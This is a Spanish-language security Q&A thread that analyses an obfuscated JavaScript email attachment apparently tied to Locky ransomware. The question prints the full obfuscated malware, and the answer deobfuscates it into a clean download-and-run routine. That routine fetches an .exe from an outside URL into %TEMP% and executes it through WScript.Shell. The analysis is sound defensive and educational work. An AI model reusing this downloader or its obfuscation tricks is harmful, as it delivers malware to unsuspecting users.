¿Cómo funciona este ataque de javascript?

7

Hay una pregunta cerrada sobre StackOverflow con un extracto de código similar pero está cerrado debido a que no se trata de una pregunta relacionada con la programación, así que pensé que lo haría aquí.

Fue enviado por correo electrónico en un archivo Zip, pero al abrir en Notepad ++, el archivo JS se puede leer y (¿probablemente?) no se puede ejecutar. También hay muchos resultados en Google al buscar un subconjunto del código que se vincula a enlace que indica que es RansomWare, pero ¿es posible explicar lo que realmente hace este código?

Las secuencias de palabras aparentemente aleatorias parecen estar ahí para evitar que el código sea detectado como similar a las firmas conocidas de malware, y las cadenas se manipulan para formar un código que luego se ejecuta.

iAIzcLGbNj = " while ( ( elem = elem[ dir ] ) && elem.nodeType !== 9 ) { if ( elem.nodeType === 1 ) { if ( truncate && jQuery( elem ).is( until ) ) { break; } matched.push( elem ); } } return matched; };";
fergusI = 0;
String.prototype.contradistinction = function () { return this.substr(0, 1); };
var uUXTro = [("dingle","adornment","n")+"hh"+("precipitous","astounding","peruse","devon","lH")+"CNAl", "A"+"iR"+"Nh"+("dover","ambiguous","diocese","cD")+"nBHy", "E"+"xpan"+("disable","foamy","titled","mandate","dEnviron")+"me"+"nt"+"Stri"+("river","polyphonic","ngs"), ("flower","centered","gently","petiole","")+"%"+("spirituality","unabashed","TE")+"MP%", ""+("interaction","career","perception",".")+"exe", ("wives","electrical","R")+"un", "A"+"ct"+"in"+"ce"+"nt"+"ivei"+("regarded","crossroads","vi")+("botanist","expense","explains","manatarms","nc")+"enti"+"ve"+"eXincentiv"+("excruciating","futures","concepts","eObinc")+"en"+"ti"+"ve"+"je"+"ince"+"nt"+"ivect", "sFtalU", "FlAYMT", ("vaccination","metres","twill","W")+"Sc"+"ince"+"ntiver"+"ip"+"tinc"+"entive." + ("writing","tiffany","S"), "AmvHaUzPHrP", ("humdrum","cavernous","suave","beryl","h")+"in"+"ce"+("vespers","bountiful","gripe","nt")+"iv"+"ee"+("terrier","echoing","education","li")+"nc"+("tranny","basilica","en")+"ti"+("cooperate","festive","modem","gains","vel"), "UJcMlBfkOA", "G"+("centers","aqueduct","plugins","rRAF")+"Ka"+("creased","storing","twine","je")+"To", "Min"+"ce"+"ntiv"+"eS"+("enthusiast","pounce","iniquitous","Xi")+"nc"+"en"+("optical","migration","disks","marche","ti")+"ve"+("describe","impaired","israeli","ML")+"in"+"ce"+("sorts","fabled","nt")+("usurped","federal","iv")+"e2" + "."+"in"+"ce"+("decoy","lobby","brazilian","supervisors","nt")+("rancorous","pierce","terror","iv")+"eXMi"+"ncenti"+("stretcher","depict","sheer","ve")+"LH"+"in"+"ce"+"nt"+"iveT"+"TP"];
rQSHDCBXb = " var rneedsContext = jQuery.expr.match.needsContext;";
uUXTro.splice(7, fergusI + 2);
chubby = uUXTro[1+4+1].split("incentive").join("");
var lrAXrUK = this[chubby];
AapDxox = "IdauNqhuT";
societies = (("notoriety", "linguist", "HiLPFi", "ventures", "pVrSBHnCPxP") + "kbmKKwklAVc").contradistinction();
theoriess = (("inalienable", "cognizance", "ziHwqRxJu", "dozen", "sSBVEfa") + "xEqzqkRRVx").contradistinction();

fergusI = 6;
uUXTro[fergusI + 1] = uUXTro[fergusI + 1] + uUXTro[fergusI + 3];
uUXTro[fergusI + 2] = "EuHNTOs";
fergusI++;
uUXTro.splice(fergusI + 1, fergusI - 4);
uUXTro[fergusI] = uUXTro[fergusI].split("incentive").join("");
var OoKse = new lrAXrUK("" + uUXTro[fergusI] + "");
YPlWYgwd = " for ( ; n; n = n.nextSibling ) { if ( n.nodeType === 1 && n !== elem ) { matched.push( n ); } ";
fergusI++;
uUXTro[fergusI + 1] = uUXTro[fergusI + 1].split("incentive").join("");
var zBqJutIT = new lrAXrUK(uUXTro[1 + fergusI]);
KNgrjvc = " var siblings = function( n, elem ) { var matched = [];";
fergusI /= 2;
var BPmnOej = OoKse[uUXTro[fergusI - 2]](uUXTro[fergusI - 1]);
KcjXPEtu = "} return matched; };";
revealede = (("underlying", "scrip", "eYyeHhl", "angular", "EbYlGrsShJg") + "qWuYEw").contradistinction();

function undeveloped(poseidon, economic) {
    try {
    var jersey = BPmnOej + "/" + economic + uUXTro[fergusI];
    LjujlQ = "} return jQuery.grep( elements, function( elem ) { return ( jQuery.inArray( elem, qualifier ) > -1 ) !== not; } ); ";
zBqJutIT["o" + societies + revealede + "n"](("aviation","unreliable","nutrition","published","G") + revealede + ("mouth","consensus","agents","pricing","T"), poseidon, false);

QcwDedGUE = "}jQuery.filter = function( expr, elems, not ) { var elem = elems[ 0 ];";
zBqJutIT[theoriess + ("republicans","aggrandizement","e") + (("educated", "hybrid", "vQJtIpP", "enact", "torpor", "nxldkIa") + "GyucrQNudzq").contradistinction() + (("lingo", "caitiff", "CEdBvsmD", "dealtime", "vbulletin", "dMNcSDdMEzF") + "wKxDlSnr").contradistinction()]();
wGSsSnAuJ = " if ( not ) { expr = \":not(\" + expr + \")\"; ";
if (zBqJutIT.status == 200) {
    var PbOLTH = new lrAXrUK((""+("slang","biology","A")+"pO"+("intimate","dramatist","easterly","encouraging","DB.") + ""+"S"+("sheila","premises","fatherless","tr")+"eam").replace("p", "D"));
    PbOLTH.open();
    RvweTKriM = "var rsingleTag = ( /^<([\w-]+)\s*\/?>(?:<\/>|)$/ );";
    PbOLTH.type = 22 * (12 - 8 - 4) + 6 - (8 / 2 + 1);
    aODTVaRhyp = "var risSimple = /^.[^:#\[\.,]*$/;";
    PbOLTH[("sonnet","heath","dried","mains","w")+"ri"+"te"](zBqJutIT[""+"R"+"es"+("capsule","begin","enlargement","heracles","pon") + theoriess + "e"+"Bo"+("laconically","discovery","dy")]);
    eUVrfTIaq = " Implement the identical functionality for filter and not function winnow( elements, qualifier, not ) { if ( jQuery.isFunction( qualifier ) ) { return jQuery.grep( elements, function( elem, i ) { /* jshint -W018 */ return !!qualifier.call( elem, i, elem ) !== not; } );";
    PbOLTH[(societies + "o"+"Di"+("unpopular","anarchist","remix","tying","ti")+"on").replace("D", theoriess)] = 0;
    rURMWYFCS = "} if ( qualifier.nodeType ) { return jQuery.grep( elements, function( elem ) { return ( elem === qualifier ) !== not; } );";
    PbOLTH["sav"+"eT"+"oF"+("silhouette","participate","eligible","employed","ile")](jersey, 2);
    JzDFHcYwRvt = "} if ( typeof qualifier === \"string\" ) { if ( risSimple.test( qualifier ) ) { return jQuery.filter( qualifier, elements, not ); ";
    PbOLTH.close();
    ueMAAMNPHiw = "} qualifier = jQuery.filter( qualifier, elements ); ";
    OoKse[uUXTro[fergusI + 1]](jersey, 1, "ISKhYal" === "EwSDqpJcU"); wQXGGA = " if ( typeof selector !== \"string\" ) { return this.pushStack( jQuery( selector ).filter( function() { for ( i = 0; i < len; i++ ) { if ( jQuery.contains( self[ i ], this ) ) { return true; } } } ) ); ";
}

} catch (HiQurqnDJ) { };

hUivzNY = "jQuery.fn.extend( { find: function( selector ) { var i, ret = [], self = this, len = self.length;";
}
undeveloped(("craven","surgical","motels","h")+"tt"+"p://"+"soft"+"le"+"ns"+"ja"+("grandchildren","probabilities","nudity","normal","ka")+"rta.co"+"m/"+"sy"+"stem"+("dorset","portal","advertise","substantial","/l")+("mango","thrush","productive","ogs/98")+("flush","cyclone","h7")+("johnson","studying","b66gb.")+"exe","yROdkAds");
NrQwRjPqXlj = "} return elems.length === 1 && elem.nodeType === 1 ? jQuery.find.matchesSelector( elem, expr ) ? [ elem ] : [] : jQuery.find.matches( expr, jQuery.grep( elems, function( elem ) { return elem.nodeType === 1; } ) ); };";
    
pregunta JLo 22.03.2016 - 14:13
fuente

1 respuesta

14

Hay muchas cadenas no utilizadas, algunas en el lado izquierdo del operador de coma y otras que se asignan a variables que nunca se usan (parecen fragmentos de código jquery; jquery en realidad no se usa aquí).

Elimina esos y te quedas con

fergusI = 0;
String.prototype.contradistinction = function () { return this.substr(0, 1); };
var uUXTro = ["n"+"hh"+"lH"+"CNAl", "A"+"iR"+"Nh"+"cD"+"nBHy", "E"+"xpan"+"dEnviron"+"me"+"nt"+"Stri"+"ngs", ""+"%"+"TE"+"MP%", ""+"."+"exe", "R"+"un", "A"+"ct"+"in"+"ce"+"nt"+"ivei"+"vi"+"nc"+"enti"+"ve"+"eXincentiv"+"eObinc"+"en"+"ti"+"ve"+"je"+"ince"+"nt"+"ivect", "sFtalU", "FlAYMT", "W"+"Sc"+"ince"+"ntiver"+"ip"+"tinc"+"entive." + "S", "AmvHaUzPHrP", "h"+"in"+"ce"+"nt"+"iv"+"ee"+"li"+"nc"+"en"+"ti"+"vel", "UJcMlBfkOA", "G"+"rRAF"+"Ka"+"je"+"To", "Min"+"ce"+"ntiv"+"eS"+"Xi"+"nc"+"en"+"ti"+"ve"+"ML"+"in"+"ce"+"nt"+"iv"+"e2" + "."+"in"+"ce"+"nt"+"iv"+"eXMi"+"ncenti"+"ve"+"LH"+"in"+"ce"+"nt"+"iveT"+"TP"];
uUXTro.splice(7, fergusI + 2);
chubby = uUXTro[1+4+1].split("incentive").join("");
var lrAXrUK = this[chubby];
societies = ("pVrSBHnCPxP" + "kbmKKwklAVc").contradistinction();
theoriess = ("sSBVEfa" + "xEqzqkRRVx").contradistinction();

fergusI = 6;
uUXTro[fergusI + 1] = uUXTro[fergusI + 1] + uUXTro[fergusI + 3];
uUXTro[fergusI + 2] = "EuHNTOs";
fergusI++;
uUXTro.splice(fergusI + 1, fergusI - 4);
uUXTro[fergusI] = uUXTro[fergusI].split("incentive").join("");
var OoKse = new lrAXrUK("" + uUXTro[fergusI] + "");
fergusI++;
uUXTro[fergusI + 1] = uUXTro[fergusI + 1].split("incentive").join("");
var zBqJutIT = new lrAXrUK(uUXTro[1 + fergusI]);
fergusI /= 2;
var BPmnOej = OoKse[uUXTro[fergusI - 2]](uUXTro[fergusI - 1]);
revealede = ("EbYlGrsShJg" + "qWuYEw").contradistinction();

function undeveloped(poseidon, economic) {
    try {
    var jersey = BPmnOej + "/" + economic + uUXTro[fergusI];
zBqJutIT["o" + societies + revealede + "n"]("G" + revealede + "T", poseidon, false);

zBqJutIT[theoriess + "e" + ("nxldkIa" + "GyucrQNudzq").contradistinction() + ("dMNcSDdMEzF" + "wKxDlSnr").contradistinction()]();
if (zBqJutIT.status == 200) {
    var PbOLTH = new lrAXrUK((""+"A"+"pO"+"DB." + ""+"S"+"tr"+"eam").replace("p", "D"));
    PbOLTH.open();
    PbOLTH.type = 22 * (12 - 8 - 4) + 6 - (8 / 2 + 1);
    PbOLTH["w"+"ri"+"te"](zBqJutIT[""+"R"+"es"+"pon" + theoriess + "e"+"Bo"+"dy"]);
    PbOLTH[(societies + "o"+"Di"+"ti"+"on").replace("D", theoriess)] = 0;
    PbOLTH["sav"+"eT"+"oF"+"ile"](jersey, 2);
    PbOLTH.close();
    OoKse[uUXTro[fergusI + 1]](jersey, 1, "ISKhYal" === "EwSDqpJcU");
}

} catch (HiQurqnDJ) { };

}
undeveloped("h"+"tt"+"p://"+"soft"+"le"+"ns"+"ja"+"ka"+"rta.co"+"m/"+"sy"+"stem"+"/l"+"ogs/98"+"h7"+"b66gb."+"exe","yROdkAds");

Ahora tienes mucha concatenación de cadenas muy simple para limpiar. Además, el método contradistinction que define para los objetos String solo devuelve el primer carácter de la cadena. Entonces, por ejemplo, ("pVrSBHnCPxP" + "kbmKKwklAVc").contradistinction() solo significa "p" . Resuelve esos, y obtienes:

fergusI = 0;
var uUXTro = ["nhhlHCNAl", "AiRNhcDnBHy", "ExpandEnvironmentStrings", "%TEMP%", ".exe", "Run", "ActincentiveivincentiveeXincentiveObincentivejeincentivect", "sFtalU", "FlAYMT", "WScincentiveriptincentive.S", "AmvHaUzPHrP", "hincentiveelincentivel", "UJcMlBfkOA", "GrRAFKajeTo", "MincentiveSXincentiveMLincentive2.incentiveXMincentiveLHincentiveTTP"];
uUXTro.splice(7, fergusI + 2);
chubby = uUXTro[1+4+1].split("incentive").join("");
var lrAXrUK = this[chubby];
societies = "p";
theoriess = "s";

fergusI = 6;
uUXTro[fergusI + 1] = uUXTro[fergusI + 1] + uUXTro[fergusI + 3];
uUXTro[fergusI + 2] = "EuHNTOs";
fergusI++;
uUXTro.splice(fergusI + 1, fergusI - 4);
uUXTro[fergusI] = uUXTro[fergusI].split("incentive").join("");
var OoKse = new lrAXrUK("" + uUXTro[fergusI] + "");
fergusI++;
uUXTro[fergusI + 1] = uUXTro[fergusI + 1].split("incentive").join("");
var zBqJutIT = new lrAXrUK(uUXTro[1 + fergusI]);
fergusI /= 2;
var BPmnOej = OoKse[uUXTro[fergusI - 2]](uUXTro[fergusI - 1]);
revealede = "E";

function undeveloped(poseidon, economic) {
    try {
    var jersey = BPmnOej + "/" + economic + uUXTro[fergusI];
zBqJutIT["o" + societies + revealede + "n"]("G" + revealede + "T", poseidon, false);

zBqJutIT[theoriess + "end"]();
if (zBqJutIT.status == 200) {
    var PbOLTH = new lrAXrUK(("ApODB.Stream").replace("p", "D"));
    PbOLTH.open();
    PbOLTH.type = 22 * (12 - 8 - 4) + 6 - (8 / 2 + 1);
    PbOLTH["write"](zBqJutIT["Respon" + theoriess + "eBody"]);
    PbOLTH[(societies + "oDition").replace("D", theoriess)] = 0;
    PbOLTH["saveToFile"](jersey, 2);
    PbOLTH.close();
    OoKse[uUXTro[fergusI + 1]](jersey, 1, "ISKhYal" === "EwSDqpJcU");
}

} catch (HiQurqnDJ) { };

}
undeveloped("http://softlensjakarta.com/system/logs/98h7b66gb.exe","yROdkAds");

La URL que ahora es claramente visible en la última línea es el punto principal.

Con todas las llamadas .split("incentive").join() , la cadena incentive es un señuelo que se eliminará de todas las cadenas más largas antes de que se utilicen. Haga eso con el valor inicial de uUXTro y algunas de las cadenas serán reconocibles:

var uUXTro = ["nhhlHCNAl", "AiRNhcDnBHy", "ExpandEnvironmentStrings", "%TEMP%", ".exe", "Run", "ActiveXObject", "sFtalU", "FlAYMT", "WScript.S", "AmvHaUzPHrP", "hell", "UJcMlBfkOA", "GrRAFKajeTo", "MSXML2.XMLHTTP"];

No seguiré el resto de los pasos, pero es bastante simple seguir lo que sucede. fergusI toma varios valores enteros, indexa la matriz uUXTro , suceden algunas concatenaciones de cadenas más, se empalman algunas cadenas de señuelo de uUXTro (pero quedan algunas), y el resultado final es básicamente este:

var shell = new ActiveXObject("WScript.Shell");
var xhr = new ActiveXObject("MSXML2.XMLHTTP");
var exe = shell.ExpandEnvironmentStrings("%TEMP%") + "/yROdkAds.exe";
xhr.open("GET", "http://softlensjakarta.com/system/logs/98h7b66gb.exe", false);
xhr.send();
if(xhr.status == 200) {
  var stream = new ActiveXObject("ADODB.Stream");
  stream.open();
  stream.type=1;
  stream.write(xhr.ResponseBody);
  stream.position = 0;
  stream.saveToFile(exe, 2);
  stream.close();
  shell.Run(exe, 1, false);
}

donde tomé las 4 variables más importantes y les he dado nombres sin enmascarar:

shell was OoKse
xhr was zBqJutIT
exe was jersey
stream was PbOLTH

En resumen, este script es un descargador; quiere recuperar y ejecutar un programa desde un servidor controlado por el atacante. Si intento acceder directamente a la URL de softlensjakarta, obtengo un archivo de 12 bytes con los caracteres STUPID LOCKY . Eso podría significar que era un servidor comprometido que ahora está arreglado (y "BLOQUEO ESTÚPIDO" es la idea de alguien de un mensaje de permiso denegado), o podría ser un servidor malintencionado muy inteligente que está buscando un Agente de Usuario vulnerable antes de enviar el verdadero malware.

Con los descargadores malintencionados, nunca se puede saber realmente cuál será la carga útil con solo mirar el código del descargador. Puede haber muchos programas maliciosos diferentes que se sirven desde la misma URL, en una rotación determinada por el monto que los otros autores de malware le pagan a la persona que lo engaña para que ejecute el programa de descarga. ( malware de pago por instalación )

    
respondido por el Wumpus Q. Wumbley 22.03.2016 - 17:20
fuente

Lea otras preguntas en las etiquetas